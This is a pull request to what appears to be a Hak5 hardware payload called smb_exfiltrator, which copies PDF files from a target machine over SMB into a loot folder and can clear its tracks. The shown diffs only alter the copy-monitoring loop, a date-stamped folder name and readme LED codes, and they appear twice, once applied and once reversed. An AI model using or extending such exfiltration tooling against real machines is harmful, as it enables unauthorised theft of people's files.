### PR TITLE
improved monitoring of file copy for smb_exfiltrator

### DIFF
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -21,7 +21,6 @@
 LOOTDIR=/root/udisk/loot/smb_exfiltrator
 EXFILTRATE_FILES="*.pdf"
 CLEARTRACKS="yes" # yes or no
-DATE=$(date +%Y%m%d_%H%M%S)
 # Initialization
 LED R G 100
 
@@ -107,7 +106,7 @@ done
 
 # Move files from staging area to loot directory
 LED R G B
-mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$DATE
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
 sync; sleep 1; sync
 
 # Trap is clean

--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -21,7 +21,7 @@
 LOOTDIR=/root/udisk/loot/smb_exfiltrator
 EXFILTRATE_FILES="*.pdf"
 CLEARTRACKS="yes" # yes or no
-
+DATE=$(date +%Y%m%d_%H%M%S)
 # Initialization
 LED R G 100
 
@@ -96,19 +96,18 @@ last=0
 current=1
 while [ "$last" != "$current" ]; do
    last=$current
-   current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1)
+   current=$(ls -lR /root/loot/smb_exfiltrator/temp/ | sha1sum)
    LED B
    sleep 1
    LED R B 100
    sleep 9
    # Files are still being copied. Loop. 
-   # (Issue may exist if file takes longer than 10s to copy)
 done
 
 
 # Move files from staging area to loot directory
 LED R G B
-mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT
+mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$DATE
 sync; sleep 1; sync
 
 # Trap is clean

--- a/payloads/library/smb_exfiltrator/readme.md
+++ b/payloads/library/smb_exfiltrator/readme.md
@@ -21,11 +21,8 @@ Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to des
 | ------------------- | -------------------------------------- |
 | Red (fast blink)    | Impacket not found in /pentest         |
 | Red (slow blink)    | Setup Failed. Target didn't obtain IP  |
-| Purple              | HID Stage                              |
-| Purple (fast blink) | Ethernet Stage                         |
+| Amber               | Initialization                         |
+| Purple (fast blink) | Switching to Mass Storage (optional)   |
 | Blue (interupt)     | Receiving files                        |
 | White               | Files received, moving to mass storage |
 | Green               | Finished                               |
-
-## Discussion
-[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")

--- a/payloads/library/smb_exfiltrator/readme.md
+++ b/payloads/library/smb_exfiltrator/readme.md
@@ -21,8 +21,11 @@ Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to des
 | ------------------- | -------------------------------------- |
 | Red (fast blink)    | Impacket not found in /pentest         |
 | Red (slow blink)    | Setup Failed. Target didn't obtain IP  |
-| Amber               | Initialization                         |
-| Purple (fast blink) | Switching to Mass Storage (optional)   |
+| Purple              | HID Stage                              |
+| Purple (fast blink) | Ethernet Stage                         |
 | Blue (interupt)     | Receiving files                        |
 | White               | Files received, moving to mass storage |
 | Green               | Finished                               |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")


### PR DESCRIPTION
Using sha1sum allows us to watch for all attribute changes including size of files. A file is growing or a new files exists the sha1sum will change and continue the loop

Also added in a date variable so when we copy files over to the LOOTDIR it creates them in a folder with the date and time.
Less math to figure out when you actually ran the exfiltration